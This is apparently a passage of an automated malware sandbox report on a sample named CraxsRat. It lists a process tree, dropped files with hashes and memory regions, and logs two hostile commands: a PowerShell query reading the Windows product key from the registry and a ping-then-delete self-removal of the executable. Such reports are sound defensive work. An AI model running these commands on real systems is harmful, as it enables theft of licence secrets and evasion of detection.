                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                            3⤵
                                                                              PID:4952
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                4⤵
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:944
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe""
                                                                              3⤵
                                                                                PID:3928
                                                                                • C:\Windows\system32\PING.EXE
                                                                                  ping localhost -n 3
                                                                                  4⤵
                                                                                  • Runs ping.exe
                                                                                  PID:1752

                                                                          Network

                                                                          MITRE ATT&CK Enterprise v15

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                            Filesize

                                                                            3KB

                                                                            MD5

                                                                            8740e7db6a0d290c198447b1f16d5281

                                                                            SHA1

                                                                            ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                                            SHA256

                                                                            f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                                            SHA512

                                                                            d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                            Filesize

                                                                            944B

                                                                            MD5

                                                                            2979eabc783eaca50de7be23dd4eafcf

                                                                            SHA1

                                                                            d709ce5f3a06b7958a67e20870bfd95b83cad2ea

                                                                            SHA256

                                                                            006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

                                                                            SHA512

                                                                            92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                            Filesize

                                                                            944B

                                                                            MD5

                                                                            2e907f77659a6601fcc408274894da2e

                                                                            SHA1

                                                                            9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

                                                                            SHA256

                                                                            385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

                                                                            SHA512

                                                                            34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            7ec0d5eb2915e811320f16a8adf30005

                                                                            SHA1

                                                                            81e30df0d790e978818d790e22ffcbc9a79887fc

                                                                            SHA256

                                                                            0113f2ba4fcb9b513994aa92315be3bdfe1c9d42ea6ae162a8ba839d23d14eac

                                                                            SHA512

                                                                            74dcb73ca3981deaa50e991a938a377b4eac9870b716253878cdd1d58e86b36fd47ca5aa572ad7fe5849d23b9c72d2b09f0e57c94a80d73373b2a93bc64f2152

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                            Filesize

                                                                            944B

                                                                            MD5

                                                                            cadef9abd087803c630df65264a6c81c

                                                                            SHA1

                                                                            babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                                                                            SHA256

                                                                            cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                                                                            SHA512

                                                                            7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            a28115a0b99e1628f4b22fe751626704

                                                                            SHA1

                                                                            f6c1a3bb1c46eea1d8ac31551e3b91b2004fc57e

                                                                            SHA256

                                                                            8fe0f9cb43d348eeb8de56f9ccca2ca5b787978f2e41b861bb04a5b134839f60

                                                                            SHA512

                                                                            7ee7051a3dbe621096dcf7c3b2c0ccd6c5ca30729bf3322597b74e8299c742a5653c73b9a7013a2565dc7a0da3de0af4a6fb4c38417748469983bf1117b16ee1

                                                                          • C:\Users\Admin\AppData\Local\Temp\RES6987.tmp
                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            a2917fb43e71e05b0a4cb07ba23a9c94

                                                                            SHA1

                                                                            7c28fae4fae74f01962e2d0b02a47d3e40673fbf

                                                                            SHA256

                                                                            5cdab3b70b5a969a7e5e463fbeb2e7c9b84cef79e760d74ca994df422673d0be

                                                                            SHA512

                                                                            a68c9e3ac61c66ab5540d69fe14730efd97492ec94e9ff43bc5785a5da19ca6843d23e670ac63da18df09b82d7e992dcc3691d6e3d44ca877e69f433997f0c48

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\VCRUNTIME140.dll
                                                                            Filesize

                                                                            95KB

                                                                            MD5

                                                                            f34eb034aa4a9735218686590cba2e8b

                                                                            SHA1

                                                                            2bc20acdcb201676b77a66fa7ec6b53fa2644713

                                                                            SHA256

                                                                            9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1

                                                                            SHA512

                                                                            d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\_bz2.pyd
                                                                            Filesize

                                                                            47KB

                                                                            MD5

                                                                            fba120a94a072459011133da3a989db2

                                                                            SHA1

                                                                            6568b3e9e993c7e993a699505339bbebb5db6fb0

                                                                            SHA256

                                                                            055a93c8b127dc840ac40ca70d4b0246ac88c9cde1ef99267bbe904086e0b7d3

                                                                            SHA512

                                                                            221b5a2a9de1133e2866b39f493a822060d3fb85f8c844c116f64878b9b112e8085e61d450053d859a63450d1292c13bd7ec38b89fe2dfa6684ac94e090ec3aa

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\_ctypes.pyd
                                                                            Filesize

                                                                            58KB

                                                                            MD5

                                                                            31859b9a99a29127c4236968b87dbcbb

                                                                            SHA1

                                                                            29b4ee82aa026c10fe8a4f43b40cbd8ec7ea71e5

                                                                            SHA256

                                                                            644712c3475be7f02c2493d75e6a831372d01243aca61aa8a1418f57e6d0b713

                                                                            SHA512

                                                                            fec3ab9ce032e02c432d714de0d764aab83917129a5e6eeca21526b03176da68da08024d676bc0032200b2d2652e6d442ca2f1ef710a7408bd198995883a943a

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\_decimal.pyd
                                                                            Filesize

                                                                            106KB

                                                                            MD5

                                                                            7cdc590ac9b4ffa52c8223823b648e5c

                                                                            SHA1

                                                                            c8d9233acbff981d96c27f188fcde0e98cdcb27c

                                                                            SHA256

                                                                            f281bd8219b4b0655e9c3a5516fe0b36e44c28b0ac9170028dd052ca234c357c

                                                                            SHA512

                                                                            919c36be05f5f94ec84e68ecca43c7d43acb8137a043cf429a9e995643ca69c4c101775955e36c15f844f64fc303999da0cbfe5e121eb5b3ffb7d70e3cd08e0b

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\_hashlib.pyd
                                                                            Filesize

                                                                            35KB

                                                                            MD5

                                                                            659a5efa39a45c204ada71e1660a7226

                                                                            SHA1

                                                                            1a347593fca4f914cfc4231dc5f163ae6f6e9ce0

                                                                            SHA256

                                                                            b16c0cc3baa67246d8f44138c6105d66538e54d0afb999f446cae58ac83ef078

                                                                            SHA512

                                                                            386626b3bad58b450b8b97c6ba51ce87378cddf7f574326625a03c239aa83c33f4d824d3b8856715f413cfb9238d23f802f598084dbd8c73c8f6c61275fdecb5

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\_lzma.pyd
                                                                            Filesize

                                                                            85KB

                                                                            MD5

                                                                            864b22495372fa4d8b18e1c535962ae2

                                                                            SHA1

                                                                            8cfaee73b7690b9731303199e3ed187b1c046a85

                                                                            SHA256

                                                                            fc57bd20b6b128afa5faaac1fd0ce783031faaf39f71b58c9cacf87a16f3325f

                                                                            SHA512

                                                                            9f26fe88aca42c80eb39153708b2315a4154204fc423ca474860072dd68ccc00b7081e8adb87ef9a26b9f64cd2f4334f64bc2f732cd47e3f44f6cf9cc16fa187

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\_queue.pyd
                                                                            Filesize

                                                                            25KB

                                                                            MD5

                                                                            bebc7743e8af7a812908fcb4cdd39168

                                                                            SHA1

                                                                            00e9056e76c3f9b2a9baba683eaa52ecfa367edb

                                                                            SHA256

                                                                            cc275b2b053410c6391339149baf5b58df121a915d18b889f184be02bedaf9bc

                                                                            SHA512

                                                                            c56496c6396b8c3ec5ec52542061b2146ea80d986dfe13b0d4feb7b5953c80663e34ccd7b7ee99c4344352492be93f7d31f7830ec9ec2ca8a0c2055cb18fa8db

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\_socket.pyd
                                                                            Filesize

                                                                            42KB

                                                                            MD5

                                                                            49f87aec74fea76792972022f6715c4d

                                                                            SHA1

                                                                            ed1402bb0c80b36956ec9baf750b96c7593911bd

                                                                            SHA256

                                                                            5d8c8186df42633679d6236c1febf93db26405c1706f9b5d767feab440ea38b0

                                                                            SHA512

                                                                            de58d69228395827547e07695f70ef98cdaf041ebaae0c3686246209254f0336a589b58d44b7776ccae24a5bc03b9dc8354c768170b1771855f342eecc5fead4

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\_sqlite3.pyd
                                                                            Filesize

                                                                            50KB

                                                                            MD5

                                                                            70a7050387359a0fab75b042256b371f

                                                                            SHA1

                                                                            5ffc6dfbaddb6829b1bfd478effb4917d42dff85

                                                                            SHA256

                                                                            e168a1e229f57248253ead19f60802b25dc0dbc717c9776e157b8878d2ca4f3d

                                                                            SHA512

                                                                            154fd26d4ca1e6a85e3b84ce9794a9d1ef6957c3bba280d666686a0f14aa571aaec20baa0e869a78d4669f1f28ea333c0e9e4d3ecd51b25d34e46a0ef74ee735

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\_ssl.pyd
                                                                            Filesize

                                                                            62KB

                                                                            MD5

                                                                            9a7ab96204e505c760921b98e259a572

                                                                            SHA1

                                                                            39226c222d3c439a03eac8f72b527a7704124a87

                                                                            SHA256

                                                                            cae09bbbb12aa339fd9226698e7c7f003a26a95390c7dc3a2d71a1e540508644

                                                                            SHA512

                                                                            0f5f58fb47379b829ee70c631b3e107cde6a69dc64e4c993fb281f2d5ada926405ce29ea8b1f4f87ed14610e18133932c7273a1aa209a0394cc6332f2aba7e58

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\base_library.zip
                                                                            Filesize

                                                                            859KB

                                                                            MD5

                                                                            483d9675ef53a13327e7dfc7d09f23fe

                                                                            SHA1

                                                                            2378f1db6292cd8dc4ad95763a42ad49aeb11337

                                                                            SHA256

                                                                            70c28ec0770edefcef46fa27aaa08ba8dc22a31acd6f84cb0b99257dca1b629e

                                                                            SHA512

                                                                            f905eb1817d7d4cc1f65e3a5a01bade761bca15c4a24af7097bc8f3f2b43b00e000d6ea23cd054c391d3fdc2f1114f2af43c8bb6d97c1a0ce747763260a864f5

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\blank.aes
                                                                            Filesize

                                                                            72KB

                                                                            MD5

                                                                            59b41f1ebd1accf49fe22bceeffa2716

                                                                            SHA1

                                                                            d26f1579db823e3523afeb84c1cc76e30f46f40d

                                                                            SHA256

                                                                            6238cb5cd66070c18672b712ce76f44dda5ce733c272cc82aec73b3797bc6a42

                                                                            SHA512

                                                                            70da542b8b58adf1e603e3bf46d2eb9dd929db112863cd9bd51cd2d6d15cb72454eecd2bb7e041909d53aa37690e82eb8e9e7b324afec150cb73581aefbd459a

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\libcrypto-1_1.dll
                                                                            Filesize

                                                                            1.1MB

                                                                            MD5

                                                                            bbc1fcb5792f226c82e3e958948cb3c3

                                                                            SHA1

                                                                            4d25857bcf0651d90725d4fb8db03ccada6540c3

                                                                            SHA256

                                                                            9a36e09f111687e6b450937bb9c8aede7c37d598b1cccc1293eed2342d11cf47

                                                                            SHA512

                                                                            3137be91f3393df2d56a3255281db7d4a4dccd6850eeb4f0df69d4c8dda625b85d5634fce49b195f3cc431e2245b8e9ba401baaa08778a467639ee4c1cc23d8d

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\libffi-7.dll
                                                                            Filesize

                                                                            23KB

                                                                            MD5

                                                                            6f818913fafe8e4df7fedc46131f201f

                                                                            SHA1

                                                                            bbb7ba3edbd4783f7f973d97b0b568cc69cadac5

                                                                            SHA256

                                                                            3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56

                                                                            SHA512

                                                                            5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\libssl-1_1.dll
                                                                            Filesize

                                                                            204KB

                                                                            MD5

                                                                            ad0a2b4286a43a0ef05f452667e656db

                                                                            SHA1

                                                                            a8835ca75768b5756aa2445ca33b16e18ceacb77

                                                                            SHA256

                                                                            2af3d965863018c66c2a9a2d66072fe3657bbd0b900473b9bbdcac8091686ae1

                                                                            SHA512

                                                                            cceb5ec1dd6d2801abbacd6112393fecbf5d88fe52db86cfc98f13326c3d3e31c042b0cc180b640d0f33681bdd9e6a355dc0fbfde597a323c8d9e88de40b37c4

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\python310.dll
                                                                            Filesize

                                                                            1.4MB

                                                                            MD5

                                                                            4a6afa2200b1918c413d511c5a3c041c

                                                                            SHA1

                                                                            39ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3

                                                                            SHA256

                                                                            bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da

                                                                            SHA512

                                                                            dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\rar.exe
                                                                            Filesize

                                                                            615KB

                                                                            MD5

                                                                            9c223575ae5b9544bc3d69ac6364f75e

                                                                            SHA1

                                                                            8a1cb5ee02c742e937febc57609ac312247ba386

                                                                            SHA256

                                                                            90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                            SHA512

                                                                            57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\rarreg.key
                                                                            Filesize

                                                                            456B

                                                                            MD5

                                                                            4531984cad7dacf24c086830068c4abe

                                                                            SHA1

                                                                            fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                            SHA256

                                                                            58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                            SHA512

                                                                            00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\select.pyd
                                                                            Filesize

                                                                            25KB

                                                                            MD5

                                                                            b6de7c98e66bde6ecffbf0a1397a6b90

                                                                            SHA1

                                                                            63823ef106e8fd9ea69af01d8fe474230596c882

                                                                            SHA256

                                                                            84b2119ed6c33dfbdf29785292a529aabbf75139d163cfbcc99805623bb3863c

                                                                            SHA512

                                                                            1fc26e8edc447d87a4213cb5df5d18f990bba80e5635e83193f2ae5368dd88a81fddfb4575ef4475e9bf2a6d75c5c66c8ed772496ffa761c0d8644fcf40517ca

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\sqlite3.dll
                                                                            Filesize

                                                                            622KB

                                                                            MD5

                                                                            0c4996047b6efda770b03f8f231e39b8

                                                                            SHA1

                                                                            dffcabcd4e950cc8ee94c313f1a59e3021a0ad48

                                                                            SHA256

                                                                            983f31bc687e0537d6028a9a65f4825cc560bbf3cb3eb0d3c0fcc2238219b5ed

                                                                            SHA512

                                                                            112773b83b5b4b71007f2668b0344bf45db03bbe1f97ae738615f3c4e2f8afb54b3ae095ea1131bf858ddfb1e585389658af5db56561609a154ae6bb80dc79ba

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30482\unicodedata.pyd
                                                                            Filesize

                                                                            289KB

                                                                            MD5

                                                                            c697dc94bdf07a57d84c7c3aa96a2991

                                                                            SHA1

                                                                            641106acd3f51e6db1d51aa2e4d4e79cf71dc1ab

                                                                            SHA256

                                                                            58605600fdaafbc0052a4c1eb92f68005307554cf5ad04c226c320a1c14f789e

                                                                            SHA512

                                                                            4f735678b7e38c8e8b693593696f9483cf21f00aea2a6027e908515aa047ec873578c5068354973786e9cfd0d25b7ab1dd6cbb1b97654f202cbb17e233247a61

                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uhnexsam.fad.ps1
                                                                            Filesize

                                                                            60B

                                                                            MD5

                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                            SHA1

                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                            SHA256

                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                            SHA512

                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                          • C:\Users\Admin\AppData\Local\Temp\p5mf05ld\p5mf05ld.dll
                                                                            Filesize

                                                                            4KB

                                                                            MD5

                                                                            b6fc57e4e774402e4363c6f1014495da

                                                                            SHA1

                                                                            e2c0397de1e782d8a7de04796eb78ea625667b2b

                                                                            SHA256

                                                                            ad7a88d92bc00073285d46d98d94fc81822c8c6992819721a680cda87d611b8b

                                                                            SHA512

                                                                            c339fb7130a4c15e012eb31374dd736bda13111f5bf4f28dfef2b0b518de9c78122d3856195d6b0f18de65c6c64209536e922f2293c47dd16ddf477ee04fd576

                                                                          • C:\Users\Admin\AppData\Local\Temp\    ‌​‍ ‍ \Common Files\Documents\Are.docx
                                                                            Filesize

                                                                            11KB

                                                                            MD5

                                                                            a33e5b189842c5867f46566bdbf7a095

                                                                            SHA1

                                                                            e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                            SHA256

                                                                            5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                            SHA512

                                                                            f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                          • C:\Users\Admin\AppData\Local\Temp\    ‌​‍ ‍ \Common Files\Documents\Files.docx
                                                                            Filesize

                                                                            11KB

                                                                            MD5

                                                                            4a8fbd593a733fc669169d614021185b

                                                                            SHA1

                                                                            166e66575715d4c52bcb471c09bdbc5a9bb2f615

                                                                            SHA256

                                                                            714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42

                                                                            SHA512

                                                                            6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

                                                                          • C:\Users\Admin\AppData\Local\Temp\    ‌​‍ ‍ \Common Files\Documents\Opened.docx
                                                                            Filesize

                                                                            11KB

                                                                            MD5

                                                                            bfbc1a403197ac8cfc95638c2da2cf0e

                                                                            SHA1

                                                                            634658f4dd9747e87fa540f5ba47e218acfc8af2

                                                                            SHA256

                                                                            272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6

                                                                            SHA512

                                                                            b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

                                                                          • C:\Users\Admin\AppData\Local\Temp\    ‌​‍ ‍ \Common Files\Documents\Recently.docx
                                                                            Filesize

                                                                            11KB

                                                                            MD5

                                                                            3b068f508d40eb8258ff0b0592ca1f9c

                                                                            SHA1

                                                                            59ac025c3256e9c6c86165082974fe791ff9833a

                                                                            SHA256

                                                                            07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7

                                                                            SHA512

                                                                            e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

                                                                          • C:\Users\Admin\AppData\Local\Temp\    ‌​‍ ‍ \Common Files\Documents\StopConvertTo.xls
                                                                            Filesize

                                                                            1.9MB

                                                                            MD5

                                                                            635391bdef6564b929c29d2cc48b2fb4

                                                                            SHA1

                                                                            0ea3ce809e7bf40eef92d970d58e516c19073622

                                                                            SHA256

                                                                            d748c5dd460f618c962f7d091def102ee46e805013483a63847040a2eac25d56

                                                                            SHA512

                                                                            947a8b7c19c41d0d2023942a2f95da661ef0691f9d3420802757565b6d057d1db84a545c75848b197b8bf535d1ac492fa6b7354eff2996255546d10548235543

                                                                          • C:\Users\Admin\AppData\Local\Temp\    ‌​‍ ‍ \Common Files\Documents\TestBackup.vsdx
                                                                            Filesize

                                                                            967KB

                                                                            MD5

                                                                            45dc1f183bdec728041c2b27fdba0871

                                                                            SHA1

                                                                            f4347db92f92f1f0548b27a797771f72b1c33d01

                                                                            SHA256

                                                                            90cd22cd928c81b9fd6a67349b583a6bdcc545246b13f09ca2bc35bda8993aa8

                                                                            SHA512

                                                                            8dd80092b746f91f25811af317b5e7dd9ce65260c60ecc59da09c558fe9b1484a12165444c5370d349f6df34e733c664ce73e4410172001e7fbb074980f22009

                                                                          • C:\Users\Admin\AppData\Local\Temp\    ‌​‍ ‍ \Common Files\Documents\These.docx
                                                                            Filesize

                                                                            11KB

                                                                            MD5

                                                                            87cbab2a743fb7e0625cc332c9aac537

                                                                            SHA1

                                                                            50f858caa7f4ac3a93cf141a5d15b4edeb447ee7

                                                                            SHA256

                                                                            57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023

                                                                            SHA512

                                                                            6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa

                                                                          • C:\Users\Admin\AppData\Local\Temp\    ‌​‍ ‍ \Common Files\Documents\WaitOut.doc
                                                                            Filesize

                                                                            1.1MB

                                                                            MD5

                                                                            f1382830233782ced68fe5f9e8c32c3b

                                                                            SHA1

                                                                            3550b18ee173c76b8723a6798c2381025d43f6a2

                                                                            SHA256

                                                                            1230d7f77e8fd5d5bd2f2a9414ac536aee638102fce28649fa84f81419aa4f0b

                                                                            SHA512

                                                                            2fbfd035fe84c37a53a6ec307998e8fd7d8e9d78b07e6a7e0e677a41a94b720d3db7aca9fa702d9647cff6121971650c7efdb69528bb02ede4821b56755dbfb8

                                                                          • C:\Users\Admin\AppData\Local\Temp\    ‌​‍ ‍ \Common Files\Downloads\BackupUse.dwg
                                                                            Filesize

                                                                            513KB

                                                                            MD5

                                                                            701cfd7e9892dd2a1c126ffeefb20fcb

                                                                            SHA1

                                                                            3bff0855dc5293c0d740713c4989e3de3c974973

                                                                            SHA256

                                                                            2f2f225756fe7c46a21136f1f3dfabffd377315a36e1f2aa627c2567e6c4d19d

                                                                            SHA512

                                                                            66cad060eeeca5b2b850846c9a35b7b154258baea7b025a1ec7aaec419ab76eb1aa3fd97ae847bad4a108924aadd0c2255920411b568c39f59e61283d316b849

                                                                          • C:\Users\Admin\AppData\Local\Temp\    ‌​‍ ‍ \Common Files\Downloads\ShowAssert.mp4
                                                                            Filesize

                                                                            1.7MB

                                                                            MD5

                                                                            8159fed72a451c624da8691fdac7d292

                                                                            SHA1

                                                                            127354eed94b38b547c76d1eb1c565b44d589bba

                                                                            SHA256

                                                                            b140002be32239f93d2bdd92f5f59eb8f2a7434ba052e62dedc28eb8dfd8e58c

                                                                            SHA512

                                                                            cb9b8a87e370cf9ae8ca8048239885c14861fb7656c2c747e243c61ca35163173a59fac424541fd9ed785dda70d23f61ebc9eba4085c800920edbbc75179cd7e

                                                                          • C:\Users\Admin\AppData\Local\Temp\    ‌​‍ ‍ \Common Files\Downloads\SubmitDisable.docx
                                                                            Filesize

                                                                            719KB

                                                                            MD5

                                                                            76012d0f5280c10002aeb4bb446ff771

                                                                            SHA1

                                                                            15bc862fe7c6342f99fe503f9bb5e0829a4114dd

                                                                            SHA256

                                                                            430e366328ac4e6e7e3a65961d792eed88fa9ea9be4ae659c3f9707a7c78820a

                                                                            SHA512

                                                                            962eb44ecac943bcd1aa5522afcdc325090d25f1b7ed6a730bebbfc6dbf46987523e26bc21318f25ac868e8ce75e7784e52796fa8d19f3e399d63a573c539667

                                                                          • C:\Users\Admin\AppData\Local\Temp\    ‌​‍ ‍ \Common Files\Downloads\UnregisterMount.mp3
                                                                            Filesize

                                                                            796KB

                                                                            MD5

                                                                            f70572f26b2f0f2d13f380741c02357d

                                                                            SHA1

                                                                            31b4dfcc8b36411fd0cd52330ff8730dcfeb218f

                                                                            SHA256

                                                                            536a888e852ab2351ae2f0662c842a38d567068157e8aebf44cd546d96d99495

                                                                            SHA512

                                                                            b71fe4669bb69fd50c9a555be220d5368c07e3f76e91ada13e168c97fc397595b16089a964f43d39bcd23072a2f1f25797e073185adf0b7ac01134f8503f5f80

                                                                          • C:\Windows\System32\drivers\etc\hosts
                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                            SHA1

                                                                            e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                            SHA256

                                                                            a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                            SHA512

                                                                            c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                          • \??\c:\Users\Admin\AppData\Local\Temp\p5mf05ld\CSC570C4C7EE9D94507BBF8BC1E8864A0B5.TMP
                                                                            Filesize

                                                                            652B

                                                                            MD5

                                                                            f2b533f3989b59bf4740d2f49c2624c3

                                                                            SHA1

                                                                            b62c0ded68a738d066a62f35d8fb9119da05e75c

                                                                            SHA256

                                                                            cacb9bceebb85a96b273508345862ba57d45c81687603017515241e30c1ef8d4

                                                                            SHA512

                                                                            1062429010535e07e90dfb065b8f28c5c668b29f0a0f2a9cb8f78f64c59d041fce90d9208ddc6c666a817874e7316ceb73ab7b6ecce4572cd2198f4682e6f491

                                                                          • \??\c:\Users\Admin\AppData\Local\Temp\p5mf05ld\p5mf05ld.0.cs
                                                                            Filesize

                                                                            1004B

                                                                            MD5

                                                                            c76055a0388b713a1eabe16130684dc3

                                                                            SHA1

                                                                            ee11e84cf41d8a43340f7102e17660072906c402

                                                                            SHA256

                                                                            8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                            SHA512

                                                                            22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                          • \??\c:\Users\Admin\AppData\Local\Temp\p5mf05ld\p5mf05ld.cmdline
                                                                            Filesize

                                                                            607B

                                                                            MD5

                                                                            4a2e5298538b1a6bca0fa2497ef626b0

                                                                            SHA1

                                                                            c531f25a0411d66914d63ba000d640b47c238b21

                                                                            SHA256

                                                                            eb2f218cbc77ea024229d4713eb19266aa16a3e23760388429c1cb29b710f084

                                                                            SHA512

                                                                            a9439c96e8bc8bc10d4853ae14aa0b28fe344bdc4099c277edc83a32e0976fdf46826677c13601957a61ca4e1555a5f073eb667fcb7f0a9366fa8f0f8ab0bae0

                                                                          • memory/1148-190-0x000001E3A7960000-0x000001E3A7968000-memory.dmp
                                                                            Filesize

                                                                            32KB

                                                                          • memory/3876-93-0x00000242ED1B0000-0x00000242ED1D2000-memory.dmp
                                                                            Filesize

                                                                            136KB

                                                                          • memory/4388-48-0x00007FF95E8C0000-0x00007FF95E8CF000-memory.dmp
                                                                            Filesize

                                                                            60KB

                                                                          • memory/4388-81-0x00007FF9571C0000-0x00007FF9571E4000-memory.dmp
                                                                            Filesize

                                                                            144KB

                                                                          • memory/4388-82-0x00007FF943570000-0x00007FF943688000-memory.dmp
                                                                            Filesize

                                                                            1.1MB

                                                                          • memory/4388-74-0x00007FF9484C0000-0x00007FF9484D5000-memory.dmp
                                                                            Filesize

                                                                            84KB

                                                                          • memory/4388-76-0x00007FF946D80000-0x00007FF9471E6000-memory.dmp
                                                                            Filesize

                                                                            4.4MB

